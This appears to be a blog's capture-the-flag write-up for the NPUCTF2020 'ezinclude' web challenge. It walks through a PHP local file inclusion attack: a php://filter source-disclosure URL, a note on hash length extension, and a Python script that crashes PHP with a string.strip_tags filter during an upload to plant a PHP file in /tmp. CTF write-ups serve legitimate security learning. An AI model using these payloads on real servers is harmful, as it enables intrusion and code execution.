当前位置:网站首页>[NPUCTF2020]ezinclude
[NPUCTF2020]ezinclude
2022-07-27 00:49:00 【A new reading of the tea classic】
[NPUCTF2020]ezinclude
![]()
f12 Check the source code and find the hash length expansion attack , And found it. hash value


Grab the bag and check , Find out bp And to hash

direct pass once , Found out flflflflag.php

Get into flflflflag.php Check it out.

Found out 404.html, It really appears when the web page enters 404
![]()

Read the source code with pseudo Protocol :
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.php

base64 Decrypt the source code , Found filtering data、input、zip
You can use :php://filter/string.strip_tags To cause php collapse , But you can upload files and save them in /tmp Catalog , We upload the Trojan horse directly , Script boy rushed out :
import requests
from io import BytesIO
url = "http://daf37d2a-5017-47b7-a42b-71db66a88c63.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
phpfile = "<?php phpinfo(); ?>"
filedata = {
"file":phpfile
}
bak = requests.post(url=url, files=filedata)
print(bak.text)After running , Not surprisingly, the page crashed :

Get into dir.php Check and find that the Trojan horse has been uploaded :
![]()
bp You can get flag

边栏推荐
- QML type system
- 3_ Jupiter notebook, numpy and mattlotlib
- [Network Research Institute] attackers scan 1.6 million WordPress websites to find vulnerable plug-ins
- [CISCN2019 华北赛区 Day1 Web5]CyberPunk
- JSCORE day_ 05(7.6)
- The use of C language static can flexibly change the life cycle and make you write code like a duck to water
- Mysql互不关联的联表查询(减少了查询的次数)
- [4.7 Gauss elimination details]
- Crop TIF image
- 【AtCoder Beginner Contest 261 (A·B·C·D)】
猜你喜欢

继承,继承,继承
![[4.9 detailed explanation of inclusion exclusion principle]](/img/c9/673507abab48a1593486c2901adac9.png)
[4.9 detailed explanation of inclusion exclusion principle]

Linux系统中安装Redis-7.0.4

DOM day_ 01 (7.7) introduction and core operation of DOM
![[CISCN2019 华东南赛区]Double Secret](/img/51/9597968ff1747a67e10a70b785ee9f.png)
[CISCN2019 华东南赛区]Double Secret

3_ Jupiter notebook, numpy and mattlotlib
Alibaba internal "shutter" core advanced notes~
![[CISCN2019 总决赛 Day2 Web1]Easyweb](/img/36/1ca4b6cae4e0dda0916b511d4bcd9f.png)
[CISCN2019 总决赛 Day2 Web1]Easyweb

Mysql互不关联的联表查询(减少了查询的次数)

QML type system
随机推荐
JSCORE day_ 04(7.5)
Detailed explanation of this point in JS
【4.1 质数及线性筛】
2020-12-22 maximum common factor
Medical data of more than 4000 people has been exposed for 16 years
DOM day_ 01 (7.7) introduction and core operation of DOM
【4.3 欧拉函数详解】
10 Web APIs
[BJDCTF2020]EzPHP
[NCTF2019]SQLi
Promise基本用法 20211130
Export and import in ES6
Eight queens n Queens
Visual studio C cs0006 C failed to find metadata file
【4.6 中国剩余定理详解】
[HITCON 2017]SSRFme
C language shutdown applet
Looking for the real murderer
JSCORE day_04(7.5)
关于Thymeleaf的表达式